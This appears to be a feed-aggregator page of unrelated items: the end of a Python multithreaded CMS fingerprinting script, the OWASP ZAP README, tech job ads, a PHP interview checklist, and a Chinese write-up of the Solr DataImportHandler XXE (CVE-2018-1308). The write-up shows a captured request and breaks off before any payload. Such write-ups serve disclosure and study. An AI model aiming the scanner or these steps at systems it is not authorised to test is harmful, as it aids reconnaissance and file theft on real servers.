                print " CMS:%s,Matched URL:%s" % (cmsname.strip('\n').strip('\r'), url)
                break
    return


if __name__ == '__main__':
    print '''
          __        ___           _    ____ __  __ ____  
          \ \      / / |__   __ _| |_ / ___|  \/  / ___| 
           \ \ /\ / /| '_ \ / _` | __| |   | |\/| \___ \ 
            \ V  V / | | | | (_| | |_| |___| |  | |___) |
             \_/\_/  |_| |_|\__,_|\__|\____|_|  |_|____/ 
    '''
    threadnum = int(raw_input(' Please input your threadnum:'))
    target_url = raw_input(' Please input your target:')

    f = open('./cms.txt')
    cms = f.readlines()
    threads = []

    if target_url.endswith('/'):
        target_url = target_url[:-1]

    if target_url.startswith('http://') or target_url.startswith('https://'):
        pass
    else:
        target_url = 'http://' + target_url

    for i in range(threadnum):
        t = threading.Thread(target=whatweb, args=(target_url,))
        threads.append(t)

    print ' The number of threads is %d' % threadnum
    print 'Matching.......'
    for t in threads:
        t.start()

    for t in threads:
        t.join()

    print " All threads exit"

Cool... and that's a simple CMS identifier done.
I haven't written anything in a while and my technique is rusty; apologies, dalao...
Finally, a song to share: Kris Wu's 'Tian Di' (天地).
I especially like the part that goes '江湖人说我不行,古人说路遥知马力,陪我走陪我闯天地,我从不将就我的命运'...
Also, I'm out of money for food; dalao, save this kid, please.
End of this installment
          GitHub - zaproxy/zaproxy: The OWASP ZAP core project      Cache   Translate Page   Web Page Cache   

README.md


The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers*. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing them. It's also a great tool for experienced pentesters to use for manual security testing.

Please help us to make ZAP even better for you by answering the ZAP User Questionnaire!

For general information about ZAP:

  • Home page - the official ZAP page on the OWASP wiki (includes a donate button;)
  • Twitter - official ZAP announcements (low volume)
  • Blog - official ZAP blog
  • Monthly Newsletters - ZAP news, tutorials, 3rd party tools and featured contributors
  • Swag! - official ZAP swag that you can buy, as well as all of the original artwork released under the CC License

For help using ZAP:

Information about the official ZAP Jenkins plugin:

To learn more about ZAP development:

Justification

Justification for the statements made in the tagline at the top;)

Popularity:

  • ToolsWatch Annual Best Free/Open Source Security Tool Survey:

Contributors:


          ApacheBench (ab): run load tests on your web page      Cache   Translate Page   Web Page Cache   

In the following article we are going to take a look at ApacheBench (ab). This is a program for the command line...

The article "ApacheBench (ab), realiza pruebas de carga de tu página web" was originally published on Ubunlog.


          New comment on Item for Geeklist "Solitaire Games on Your Table - July 2018"       Cache   Translate Page   Web Page Cache   

by kerskine

Related Item: Thunderbolt Apache Leader

Still my favorite DVG game!
          New comment on Item for Geeklist "Solitaire Games on Your Table - July 2018"       Cache   Translate Page   Web Page Cache   

by suzyvitale

Related Item: Thunderbolt Apache Leader

Very cool! This is up next on my "games to learn" stack. Your report has me even more excited about it!
          Sr Software Engineer - Hadoop / Spark Big Data - Uber - Seattle, WA      Cache   Translate Page   Web Page Cache   
Under the hood experience with open source big data analytics projects such as Apache Hadoop (HDFS and YARN), Spark, Hive, Parquet, Knox, Sentry, Presto is a...
From Uber - Sun, 13 May 2018 06:08:42 GMT - View all Seattle, WA jobs
          Software Development Manager – Big Data, AWS Elastic MapReduce (EMR) - Amazon.com - Seattle, WA      Cache   Translate Page   Web Page Cache   
Amazon EMR is a web service which enables customers to run massive clusters with distributed big data frameworks like Apache Hadoop, Hive, Tez, Flink, Spark,...
From Amazon.com - Mon, 02 Jul 2018 08:17:21 GMT - View all Seattle, WA jobs
          Sr. Technical Account Manager - Amazon.com - Seattle, WA      Cache   Translate Page   Web Page Cache   
You can also run other popular distributed frameworks such as Apache Spark, Apache Flink, and Presto in Amazon EMR;...
From Amazon.com - Wed, 20 Jun 2018 01:20:13 GMT - View all Seattle, WA jobs
          Java Developer - ALTA IT Services, LLC - Clarksburg, WV      Cache   Translate Page   Web Page Cache   
Experience with the following technologies – J2EE, Weblogic, Java, Javascript, JQuery, AngularJS, Apache, Linux, Subversion, and GitHub....
From ALTA IT Services, LLC - Tue, 12 Jun 2018 17:33:52 GMT - View all Clarksburg, WV jobs
          Data Science Solution Architect - CSRA - Chantilly, VA      Cache   Translate Page   Web Page Cache   
Provide domain expertise in big data distributed processing frameworks, Hadoop MapReduce and Yarn, Apache Spark, Open-Source and Commercial distributions...
From CSRA - Thu, 28 Jun 2018 22:14:43 GMT - View all Chantilly, VA jobs
          Data Science Solutions Architect - CSRA - Arlington, VA      Cache   Translate Page   Web Page Cache   
Provide domain expertise in big data distributed processing frameworks, Hadoop MapReduce and Yarn, Apache Spark, Open-Source and Commercial distributions...
From CSRA - Fri, 06 Jul 2018 10:19:49 GMT - View all Arlington, VA jobs
          Java/JEE Developer - Voonyx - Lac-beauport, QC      Cache   Translate Page   Web Page Cache   
Java Enterprise Edition (JEE), Eclipse/IntelliJ/Netbeans, Spring, Apache Tomcat, JBoss, WebSphere, Camel, SOAP, REST, JMS, JPA, Hibernate, JDBC, OSGI, Servlet,...
From Voonyx - Tue, 27 Mar 2018 05:13:53 GMT - View all Lac-beauport, QC jobs
          Développeur Java/JEE - Voonyx - Lac-beauport, QC      Cache   Translate Page   Web Page Cache   
Java Enterprise Edition (JEE), Eclipse/IntelliJ/Netbeans, Spring, Apache Tomcat, JBoss, WebSphere, Camel, SOAP, REST, JMS, JPA, Hibernate, JDBC, OSGI, Servlet,...
From Voonyx - Tue, 27 Mar 2018 05:13:51 GMT - View all Lac-beauport, QC jobs
          Comment on Leggerezza e potenza in PHP: Code Igniter by anonymous coward      Cache   Translate Page   Web Page Cache   
CodeIgniter è stato un framework importante, ma *consigliarlo* nel 2018 è semplicemente da irresponsabili. Il fatto che sia compatibile con PHP 5.3 significa che, a livello di codice, è fermo a dieci anni fa, e non fa alcun utilizzo di tutte le funzionalità moderne che rendono PHP non dico piacevole ma sopportabile. L'ultima major version è uscita nel 2016, da allora solo bugfix. Non esiste supporto a Composer, quindi usare pacchetti non specificatamente creati per CodeIgniter è difficile se non impossibile (alla faccia della modularità). Non esiste possibilità di creare middleware, quindi bisogna scrivere un sacco di boilerplate in ogni controller (alla faccia dell'eleganza). Poi l'ossessione per la velocità mi fa ridere, dato che nel 99% dei casi parliamo di pochi ms di differenza, che spesso vengono annullati con l'opcache di PHP, e che non sono certo il collo di bottiglia dell'applicazione come possono essere invece più facilmente le query al DB. Francamente se uno deve proprio sviluppare in PHP fa decisamente meglio a usare Laravel (magari Lumen se proprio ci tiene ai microframework) o Symfony, non certo un framework rimasto pressoché identico da più di 10 anni e che dovrebbe essere relegato ai progetti legacy. Peraltro non sono affatto più difficili da configurare (quando mai si devono modificare dei moduli Apache per installare Laravel?!), ma sospetto che per "configurare" tu intenda "caricare dei file .php su un FTP e andare su miosito.it", nel qual caso forse dovresti studiarti un po' di development moderno ma proprio dalle basi.
          XAMPP for Windows 7.2.7      Cache   Translate Page   Web Page Cache   
Description: XAMPP for Windows is an easy-to-install Apache distribution for Windows containing MySQL, PHP and Perl. Many people know from their own experience that it's not easy to install an Apache web server, and it gets harder if you want to add MySQL, PHP and […]
          XAMPP 7.2.7      Cache   Translate Page   Web Page Cache   
An Apache distribution that includes Apache 2.4, MariaDB 10.1, PHP 7.0 and phpMyAdmin 4.5; portable and Linux versions are also available (WinALL/Linux/MacOSX; open source)
          Cover letter: Shinsegae I&C SI applicant career statement, written by a practicing consultant from a group HR team      Cache   Translate Page   Web Page Cache   
[Cover Letter] Shinsegae I&C SI applicant cover letter [written by a group-HR consultant] [Cover Letter] SI-business applicant cover letter [written by a group-HR consultant] [Cover Letter] Samsung Engineering experienced applicant cover letter [written by a group-HR consultant] [Cover Letter] Pharmaceutical-sales experienced applicant cover letter [written by a group-HR consultant] [Cover Letter] GS E&C experienced applicant cover letter [written by a group-HR consultant] [Cover Letter] Foreign-airline ground-staff experienced applicant cover letter [written by a group-HR consultant] ◆ Consulting tailored to Shinsegae I&C SI applicants ◆ Catchy sub-headings to stand out from other candidates ◆ A cover letter that actually passed document screening ◆ Written by a practicing consultant who came from a conglomerate HR team ◐ Actual writing tips ◑ ▶ Projects are described in narrative form to show systematic execution. ▶ Varied project experience is described in detail to convey a professional attitude. 1. Opening: experience is the best differentiator. 2. Approaching the professional, one step at a time. 3. Key career history: making distinctive know-how my own. 4. Closing: erasing the word 'give up'. 3. OOOOOOOO Co. ◈ Development of the OOOOOO terminal for the OO business-support system (OOOO.04~2002.06) - a mobile solution that lets all OO work be done directly in the field; client-side features - environment: WINCE, Visual C++ ◈ OOOOO lost-and-found website for OOOO Co. (OOOO.06~2002.OO) - a site that helps recover easily lost items such as OOOOO or OO - member sign-up, loss-report tracking, and admin features - environment: Linux, DB2, Apache Tomcat, JSP, Java ◈ KMS/EDMS for OOOOOOOO (2002.09~2002.10) - EDMS development and maintenance - environment: Oracle 8i database server, WAS (Oracle 9iAS), Documentum package, Java servlets. From 'Key career history'. http://cafe.daum.net/InsaResume Cover letters by HR specialist Yoon Ho-sang [Cover Letter] QC and QA experienced applicant cover letter [written by a group-HR consultant] [Cover Letter] Terminal operations and logistics experienced applicant cover letter [written by a group-HR consultant] [Cover Letter] Service planning and promotions/events experienced applicant cover letter [written by a group-HR consultant] [Cover Letter] Accounting, finance, and IR experienced applicant cover letter [written by a group-HR consultant] [Cover Letter] Shinsegae Department Store floor-management applicant cover letter [written by a group-HR consultant] [Cover Letter] Shinsegae Department Store floor-sales applicant cover letter [written by a group-HR consultant] [Cover Letter] Shinsegae Department Store PR applicant cover letter [written by a group-HR consultant] [Cover Letter] Shinsegae E-Mart marketing applicant cover letter [written by a group-HR consultant] [Cover Letter] Web-planning (experienced) applicant cover letter [written by a group-HR consultant] [Cover Letter] Accounting/closing/tax/bookkeeping (experienced) applicant cover letter [written by a group-HR consultant] [Cover Letter] SI, computing, and IT applicant cover letter [written by a group-HR consultant] [Career Statement] Web-planning applicant career statement [written by a group-HR consultant] [Career Statement] Capital-firm branch-manager applicant career statement [written by a group-HR consultant] [Career Statement] Samsung Networks network-operations applicant career statement [written by a group-HR consultant] Views: 4,557
          Azure HDInsight supports Apache Spark 2.3      Cache   Translate Page   Web Page Cache   
Apache Spark 2.3.0 is now available for production use on the managed big-data service "Azure HDInsight". From bug fixes (more than 1,400 tickets were handled in this release) to new experimental features. More…...(read more)
          It's over: Eureka goes closed-source. Where does Spring Cloud go from here?      Cache   Translate Page   Web Page Cache   

This year Dubbo came back to life and was accepted into Apache. At the same time, unfortunately, the Netflix Eureka component project under Spring Cloud has announced that it is going closed-source...

Those of you who have already migrated from Dubbo to Spring Cloud: how are you holding up?

Announcement: https://github.com/Netflix/eureka/wiki

The gist: open-source work on Eureka 2.0 has stopped, and anyone building projects or code on the Eureka 2.x branch of the open-source repository does so at their own risk!

What is Eureka?

Developers who use Spring Cloud as their microservice framework will know that Eureka is its default, and recommended, service-registry component.

Eureka is the first choice for the service registry largely thanks to Netflix's excellent suite of components: Zuul (the API gateway), Hystrix (the circuit breaker), and others make Spring Cloud a one-stop solution.

Let's look at the diagram of how Eureka relates to service registration.

A brief history of Eureka as open source

Netflix officially open-sourced Eureka in 2012.

The latest Eureka 1.x release is 1.9.3; whether it will be Eureka's last open-source version remains to be seen.

No statement about this closure has appeared on the official site. Whether this is a step backwards, or something else is going on, we will keep following up.

Where does Spring Cloud go from here?

With Eureka closed-source, what will Spring Cloud do? Will the default service-registry component be replaced later? Hard to say; Spring Cloud releases so quickly that it is already hard to keep up.

Eureka 2.x never shipped a stable release, and Spring Cloud is still built on 1.x (the latest dependency is 1.9.2), so although most companies in China also use Eureka, they are not affected for now.

1.x is relatively stable, so don't rush to upgrade or switch to other middleware. Still, with Eureka closed-source, it will eventually be necessary to migrate to open-source middleware such as Consul, ZooKeeper, or Etcd.

What do you think of Eureka going closed-source and its impact? Feel free to discuss in the comments.


          Open-source OA Lemon OA releases 1.9.0, the first new version in a year      Cache   Translate Page   Web Page Cache   

lemon-1.9.0 (2018-07-06), the first new release in a year

  1. [cdn] Reorganized the static-resource paths;
    every static resource under the cdn directory now carries the component name and version number.

  2. [data] Data is no longer initialized with SQL; CSV and JSON files are used instead.

  3. [user] Improved account management.

  4. [bpm] Added several demo workflows.

  5. [biz] First attempt at vehicle, meeting-room, and attendance management.

Lemon is an open-source OA system built on Java, licensed under Apache 2.0.

Our goal is to gradually absorb all kinds of business requirements and grow into a tool stack that covers every feature, minimizing coding so that customization needs can be met through configuration alone.

Quick start

    Install the JDK.

    Download lemon-1.7.0.zip

    Unzip and run startup.bat

    After startup completes,

    visit http://localhost:8080/

Login account: lingo
Login password: 1

Web workflow designer

Integrates Modeler, so workflows can be designed by drag and drop right in the browser. (The free version does not support IE.)

Electronic forms

Design forms by drag and drop in the browser; a designed form is bound to a workflow and can be used directly without any coding.

Integrated organizational structure

Supports companies, departments, positions, and personnel, seamlessly integrated with the workflow engine.


Android client screenshots

Business background

OA, Office Automation, mainly solves the problem of collaboration inside a company, which is why it is also called collaborative office software.

So what we are really building is a way for a group of people across company departments to divide up the work and complete the same thing together; call it a project. For now we focus on two points:

  • Multi-person collaboration, reflected in the system as tasks, workflows, and calendars.

  • Knowledge accumulation, reflected in the system as documents and forums.

See the discussion of OA feature points and the feature list.

For details, see the project home page :)


          The Apache Foundation publishes its FY2018 annual report: Java projects account for the majority      Cache   Translate Page   Web Page Cache   

The Apache Software Foundation recently released its 40-page annual report for fiscal year 2018 (2017-05-01 to 2018-04-30). The world's largest open-source foundation now hosts more than 300 open-source projects spanning artificial intelligence and deep learning, big data, build management, cloud computing, content management, DevOps, IoT and edge computing, mobile, servers, web frameworks, and many other areas.

Report highlights include:

  • FY2017-2018 surplus: US$548,630;

  • 8 platinum sponsors, 9 gold sponsors, 8 silver sponsors, and 14 bronze sponsors;

  • 51 new ASF members, bringing the total to 731;

  • more than 6,700 code committers;

  • 16 projects graduated from the Apache Incubator to top-level projects;

  • top 5 Apache project categories: libraries, big data, web servers, XML, and web frameworks;

  • top 5 Apache project languages: Java, C, Python, C++, and JavaScript;

  • top 5 largest Apache repositories: OpenOffice, NetBeans, Flex, Hadoop, Trafodion;

  • top 5 Apache repositories by number of commits: Hadoop, Ambari, Camel, Ignite, Beam;

  • top 5 Apache repositories by developer mailing-list activity: Ignite, Kafka, Tomcat, Beam, James;

  • top 5 Apache repositories by user mailing-list activity: Lucene/Solr, Ignite, Flink, Kafka, Cassandra.

Full slide deck: APACHE ANNUAL REPORT FY2018


          Senior Cloud/Web Infrastructure Engineer - RK Management Consultants, Inc. - Minneapolis, MN      Cache   Translate Page   Web Page Cache   
Develop operational practice for technologies like Opscode Chef, multiple Public Cloud platforms, Basho Riak, Cassandra, Tomcat, Apache, Nginx, Sensu, Splunk,...
From Indeed - Tue, 19 Jun 2018 15:06:13 GMT - View all Minneapolis, MN jobs
          A Big Roundup of PHP Interview Knowledge      Cache   Translate Page   Web Page Cache   

This repository collects the knowledge points that are frequently asked in PHP interviews in China. It only points out the topics; you still need to find material and study each one systematically. I hope you will understand not just the what, but also the why, and the principles behind it.

If you have well-organized material for any of these topics, PRs adding links are welcome.

Basics

  • Know most of the array-handling functions
  • String-handling functions (and how the mb_ family differs)
  • & references, with worked examples
  • The difference between == and ===
  • The difference between isset and empty
  • Understand all the magic methods
  • The difference between static, $this, and self
  • The difference between private, protected, public, and final
  • OOP concepts
  • When to use an abstract class vs. an interface
  • What a Trait is
  • The difference between echo, print, and print_r
  • The difference between __construct and __destruct
  • What static does (inside a class vs. inside a function)
  • What __toString() does
  • The difference between single quotes ' and double quotes "
  • Common HTTP status codes and what each means
  • What 301 means; what about 404?

Intermediate

  • How Autoload and Composer work
  • Session sharing and lifetime
  • Exception handling
  • How to iterate an object with foreach
  • How to access an object like an array: $obj[key]
  • How to make an object callable: $obj(123);
  • What yield is, with a use case
  • What PSR is; PSR-1, 2, 4, 7
  • How to get the client IP and the server IP
  • How to turn on PHP error display
  • How to return a 301 redirect
  • How to find the path where an extension is installed
  • How strings and numbers are compared; watch out for leading-0 octal and 0x hex
  • What a BOM is and how to remove it
  • What MVC is
  • How dependency injection is implemented
  • How to execute a command asynchronously
  • What a template engine is, what problem it solves, and how it works (Smarty, Twig, Blade)
  • How to implement chained calls: $obj->w()->m()->d();
  • Using the Xhprof and Xdebug profiling tools
  • The difference between indexed arrays [1, 2] and associative arrays ['k1'=>1, 'k2'=>2]
  • Dependency-injection principles

Practice

  • Sort a given two-dimensional array by one of its fields
  • How to check an uploaded file's type, e.g. only allow jpg uploads
  • Swap two variables without a temporary: $a=1; $b=2; => $a=2; $b=1;
  • strtoupper garbles Chinese text; how would you fix php echo strtoupper('ab你好c'); ?
  • The differences between WebSocket, long-polling, and Server-Sent Events (SSE)
  • What the "Headers already sent" error means and how to avoid it

Algorithms

  • Quicksort (write it by hand)
  • Bubble sort (write it by hand)
  • Binary search (understand it)
  • The KMP string-search algorithm (understand it)
  • Depth-first and breadth-first search (understand them)

Data Structures (overview)

  • Properties of heaps and stacks
  • Queues
  • Hash tables
  • Linked lists

Comparisons

  • Cookies vs. Sessions
  • GET vs. POST
  • include vs. require
  • include_once vs. require_once
  • Memcached vs. Redis
  • MySQL storage engines and their differences (MyISAM vs. InnoDB will definitely come up)
  • HTTP vs. HTTPS
  • Apache vs. Nginx
  • define() vs. const
  • traits vs. interfaces, and what pain point traits solve
  • Git vs. SVN

Databases

  • MySQL
    • CRUD
    • JOIN, LEFT JOIN, RIGHT JOIN, INNER JOIN
    • UNION
    • Combined GROUP BY + COUNT + WHERE cases
    • Common MySQL functions, e.g. now(), md5(), concat(), uuid(), etc.
    • When 1:1, 1:n, and n:n relationships each apply
    • Database optimization techniques
      • Indexes and composite indexes (and the conditions for hitting them)
      • Sharding (horizontal and vertical table splitting)
      • Partitioning
      • Using explain to analyze SQL performance, and what each field means
      • The slow log (what it is for, and when you need it)
  • MSSQL (overview)
    • Query the 5 most recent rows
  • NoSQL
    • Redis, Memcached, MongoDB
    • Comparison and suitable scenarios
    • What problem did you solve with which one, and why did you choose it?

Server

  • Check CPU, memory, time, OS version, and other system information
  • Find files with find and grep
  • Process text with awk
  • Find the directory a command lives in
  • Have you compiled PHP yourself? How do you enable readline?
  • How to check a PHP process's memory and CPU usage
  • How to add an extension to PHP
  • Change where PHP sessions are stored; change INI parameters
  • The kinds of load balancing; explain the principle of one you know well
  • How does MySQL master-slave (M-S) replication synchronize? Push or pull? Can it fall out of sync, and what do you do then?
  • How do you keep data recoverable to the minute, even if someone drops the database?
  • Database connections exceed the maximum; how do you optimize the architecture, and where do you start?
  • What usually causes a 502, and how do you investigate it? What about a 504?

Architecture

  • Ops-leaning (overview):
    • Load balancing (Nginx, HAProxy, DNS)
    • Master-slave replication (MySQL, Redis)
    • Data redundancy and backups (how MySQL incremental and full backups work)
    • Health monitoring (both process liveness and service availability)
    • MySQL, Redis, and Memcached proxies and clusters: purpose and principles
    • Sharding
    • High-availability clusters
    • RAID
    • Compiling from source; memory tuning
  • Caching
    • Where in your work did you need caching, and briefly why in each case
  • Search solutions
  • Performance tuning
  • Monitoring schemes for every dimension
  • Centralized log collection and processing
  • Internationalization
  • Database design
  • Static-page generation

Frameworks

  • ThinkPHP (TP), CodeIgniter (CI), Zend (the non-OOP family)
  • Yaf, Phalcon (the C-extension family)
  • Yii, Laravel, Symfony (the pure-OOP family)
  • Swoole, Workerman (network-programming frameworks)
  • Angles for comparing frameworks:
    • Whether it is pure OOP
    • How classes are loaded (hand-written autoload vs. the Composer standard)
    • Ease of use (CI is a bare-bones framework; Laravel is a high-productivity framework with many bundled components)
    • Whether it is a black box (compared with the C-extension family)
    • Runtime speed (e.g. Laravel loads a great deal at startup)
    • Memory footprint

Design Patterns

  • Singleton (important)
  • Factory (important)
  • Observer (important)
  • Dependency injection (important)
  • Decorator
  • Proxy
  • Composite

Security

  • SQL injection
  • XSS and CSRF
  • Input filtering
  • Cookie security
  • Disabling the mysql_ function family
  • How user passwords should be stored in the database to be safe
  • CAPTCHA session pitfalls
  • Secure session IDs (useless to an attacker even if intercepted)
  • Directory-permission security
  • Local and remote file inclusion
  • Uploading PHP scripts through file upload
  • Script execution through the eval function
  • Shutting off dangerous functions with disable_functions
  • A dedicated FPM user and group, with specific permissions for each directory
  • The difference between hashing and encryption

Advanced

  • How PHP arrays are implemented internally (HashTable + linked list)
  • How copy-on-write works, and when GC happens
  • PHP's process model, inter-process communication methods, and the difference between processes and threads
  • The core principle behind yield
  • How PDO prepare works
  • The differences between PHP 7 and PHP 5
  • Where Swoole fits, and how its coroutines are implemented

Front End

  • Get DOM nodes and attributes with plain JS
  • The box model
  • Precedence of CSS files, style tags, and inline style attributes
  • Execution order of HTML and JS (page JS runs top to bottom)
  • JS array operations
  • Type checking
  • this scoping
  • .map() and concrete usage scenarios for this
  • Reading and writing cookies
  • jQuery operations
  • Ajax requests (synchronous vs. asynchronous); a random number to defeat caching
  • What Bootstrap is good for
  • N solutions for cross-origin requests
  • Newer technology (overview)
    • ES6
    • Modules
    • Bundling
    • Build tools
    • Vue, React, webpack
    • Front-end MVC
  • Optimization
    • The browser's per-domain concurrency limit
    • Static-resource 304 caching (how If-Modified-Since and ETag work)
    • Merging small icons into a sprite with position tricks to cut requests
    • Combining static resources into a single compressed request
    • CDN
    • Lazy loading and preloading of static resources
    • keep-alive
    • CSS at the top, JS at the bottom (and why)

Networking

  • Convert an IP address to an INT
  • What 192.168.0.1/16 means
  • What DNS is mainly for
  • The differences between IPv4 and IPv6
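A quick worked example for the first two checklist items (my own illustration, not part of the original list): packing a dotted-quad IPv4 address into a 32-bit integer, and what the /16 suffix means.

```python
import ipaddress

def ip_to_int(ip):
    """Pack a dotted-quad IPv4 address into its 32-bit integer form."""
    a, b, c, d = (int(p) for p in ip.split("."))
    return (a << 24) | (b << 16) | (c << 8) | d

# Cross-check against the standard library.
assert ip_to_int("192.168.0.1") == int(ipaddress.ip_address("192.168.0.1"))

# "/16" means the first 16 bits are the network part:
net = ipaddress.ip_network("192.168.0.0/16")
print(net.netmask)        # 255.255.0.0
print(net.num_addresses)  # 65536
```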

Network Programming

  • The TCP three-way handshake
  • TCP vs. UDP, and when to use each
  • How could you make UDP highly reliable? (overview)
  • How do you solve TCP packet sticking (message framing)?
  • Why are heartbeats needed?
  • What is a long-lived connection?
  • How does HTTPS guarantee security?
  • The difference between streams and datagrams
  • The ways processes can communicate; which is fastest?
  • What happens on fork()?

APIs

  • What RESTful is
  • How to stay compatible with DELETE requests on browsers that do not support them
  • What the APP_ID and APP_SECRET seen in common APIs are mainly for; describe the flow
  • How do you make sure API request data cannot be tampered with?
  • The difference between JSON and JSONP
  • The difference between data encryption and request signing
  • What RSA is
  • How to handle API version compatibility
  • Rate limiting (leaky bucket, token bucket)
  • The main scenarios where OAuth 2 is used
  • JWT
  • In PHP, the difference between json_encode(['key'=>123]); and return json_encode([]);, what problem arises, and how to solve it
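The token bucket mentioned under rate limiting can be sketched in a few lines. This is my own illustration with made-up parameter names: the bucket holds at most `capacity` tokens, refills at `rate` tokens per second, and a request passes only if it can pay its token cost.

```python
import time

class TokenBucket:
    """Minimal token-bucket rate limiter."""

    def __init__(self, rate, capacity):
        self.rate = float(rate)          # tokens added per second
        self.capacity = float(capacity)  # maximum burst size
        self.tokens = float(capacity)    # start full
        self.last = time.monotonic()

    def allow(self, cost=1.0):
        now = time.monotonic()
        # Refill according to elapsed time, never exceeding capacity.
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= cost:
            self.tokens -= cost
            return True
        return False

bucket = TokenBucket(rate=1, capacity=2)
print(bucket.allow(), bucket.allow(), bucket.allow())  # True True False
```

The leaky bucket differs in that it drains requests at a fixed rate instead of allowing bursts up to `capacity`.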

Bonus Points

  • Know the characteristics of common languages and where each fits.
    • PHP vs. Golang
    • PHP vs. Python
    • PHP vs. Java
  • Know PHP extension development
  • Be proficient in C

Disclaimer

This material does not target any particular company, and we take no responsibility for any effect it may have on you.

Good luck


          Infrastructure & App Monitoring Analyst - Horizontal Integration - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java & ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Horizontal Integration - Wed, 13 Jun 2018 19:35:57 GMT - View all De Pere, WI jobs
          Infrastructure & App Monitoring Analyst - Q Consulting - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java & ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Q Consulting - Thu, 07 Jun 2018 20:21:40 GMT - View all De Pere, WI jobs
          15R AH-64 Attack Helicopter Repairer      Cache   Translate Page   Web Page Cache   
MO-WHITEMAN AFB, 15R AH-64 Attack Helicopter Repairer Job Description If you're looking to take your mechanical skills to the next level, then join the Army National Guard and watch your future take flight as an AH-64 (Apache) Attack Helicopter Repairer. In this position, you will learn how to repair and maintain the mighty Apache Attack Helicopter. Specific duties may include: removing, servicing, and installing
          Need to implement a learning-to-rank algorithm in Apache Solr      Cache   Translate Page   Web Page Cache   
I have a dataset of a series of designations and I am looking to sort them on the basis of heuristics (e.g. manager > associate > analyst, and director > manager > associate manager, etc.). I require someone experienced... (Budget: ₹75000 - ₹150000 INR, Jobs: Apache Solr, Elasticsearch, Lucene, Machine Learning, Software Architecture)
          security/vuxml - 1.1_3      Cache   Translate Page   Web Page Cache   
security/vuxml: add CVE for Apache CouchDB 1.7.2 (databases/couchdb) Approved by: jrm Differential Revision: https://reviews.freebsd.org/D16212
          Puebla prosecutor's office and the SGG deny having issued arrest warrants against Morena members      Cache   Translate Page   Web Page Cache   

The Puebla State Attorney General's Office (FGE) denied that there are any arrest warrants over last week's events at the Grand Hotel MM, where Morena senators, deputies, and mayors-elect reportedly uncovered a vote-buying operation ("mapachera") run by the National Action Party (PAN) in favor of Martha Érika Alonso Hidalgo, now the state's governor-elect....

The article Fiscalía de Puebla y la SGG niega haber girado las órdenes de aprehensión contra militantes de Morena was first published on La Jornada de Oriente.


          Best modern technologies to use to build a database-driven site?      Cache   Translate Page   Web Page Cache   

for my own training purposes I may be best sticking with PHP or .Net?

I never said this. I would personally never advocate PHP, for multiple reasons I'm not going to get into here, but mostly because I see no value in it. When PHP became popular, it was the best solution on the block; today it doesn't really excel in any area that would make me give it consideration.

My suggestion has always been Node.js, because you will be using JS on the frontend anyway and it's less to learn. Writing an api endpoint that connects to a DB is stupid simple. It's also very easy to get up and running and deployed. Much easier than any kind of Apache or nginx configurations you'd need to make for PHP.

.Net is a good choice, but configuring a deployment server is going to be difficult or expensive, depending on if you choose .Net Core (difficult) or Windows Server (expensive).


          Comment on Hero Xtreme 200R First Ride Review: Xtreme Upgrade by Spec Comparo: Bajaj NS 200 v Hero Xtreme 200R v TVS Apache RTR200 4V - Best Bikes in India | No.1 Two Wheeler Magazine | Bike India      Cache   Translate Page   Web Page Cache   
[…] Earlier this month, we had a chance to ride the new Xtreme 200R at the Buddh International Circuit. Check out a brief first ride impression, here. […]
          Middleware Engineer-II (Middleware Senior) - Mainstreet Technologies, Inc - McLean, VA      Cache   Translate Page   Web Page Cache   
Middleware Engineer-II (Middleware Senior) Job Requirements: Required Skills: 3 – 5 years of Apache administration experience 5 – 7 years of WebLogic...
From Mainstreet Technologies, Inc - Thu, 17 May 2018 04:46:56 GMT - View all McLean, VA jobs
          Middleware Engineers - Mainstreet Technologies, Inc - McLean, VA      Cache   Translate Page   Web Page Cache   
Middleware Engineer Professional Required Technical Skills Bachelor’s Degree · 3 – 5 years of Apache administration experience · 5 – 7 years of WebLogic...
From Mainstreet Technologies, Inc - Mon, 14 May 2018 10:39:11 GMT - View all McLean, VA jobs
          XXE vulnerability in the Solr DIH dataConfig parameter      Cache   Translate Page   Web Page Cache   

Someone else's CVE, numbered CVE-2018-1308. I came across it by chance today, and since I happen to have set up a Solr service before, here is a quick write-up.

0x01 Background

DataImportHandler (DIH) is mainly used to fetch data from a database and build an index. After Solr has been set up and the data has been loaded into a database such as MySQL, you create a Core and generate an index over the data in the database; DIH is what performs that index generation.

When generating a core's index from the Solr web console, the dataConfig parameter is vulnerable to XXE: an attacker can submit malicious XML to the server and use it to read sensitive files and directories on the targeted host.

Affected versions:

Solr 1.2 to 6.6.2

Solr 7.0.0 to 7.2.1

Original references:

https://issues.apache.org/jira/browse/SOLR-11971

http://seclists.org/oss-sec/2018/q2/22

0x02 Vulnerability Testing

1. Open the Solr Admin console;

2. Select the core you created, then open the DataImport page;

3. Click "Execute" while capturing the traffic to obtain the exact Dataimport request.

You can also open the feature's entry URL directly:

http://www.nxadmin.com/solr/#/corename/dataimport

Taking Solr 6.0.1 as an example, the captured test request looks like this:

POST /corename/dataimport?_=1531279910257&indent=on&wt=json HTTP/1.1
Host: 61.133.214.178:9983
Content-Length: 282
Accept: application/json, text/plain, */*
Origin: http://www.nxadmin.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Content-type: application/x-www-form-urlencoded
Referer: http://www.nxadmin.com/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

command=full-import&verbose=false&clean=false&commit=false&optimize=false&core=xxetest

The vulnerable dataConfig parameter is absent from the default request; by default the configuration-file approach is used, and data-config.xml holds the MySQL connection settings along with the table fields to be indexed. The code that handles the non-default request parameters:

package org.apache.solr.handler.dataimport;
......
public class RequestInfo {
  private final String command;
  private final boolean debug;  
  private final boolean syncMode;
  private final boolean commit; 
  private final boolean optimize;
  ......
  private final String configFile;
  private final String dataConfig;

  public RequestInfo(SolrQueryRequest request, Map<String,Object> requestParams, ContentStream stream) {
  
  ......
  
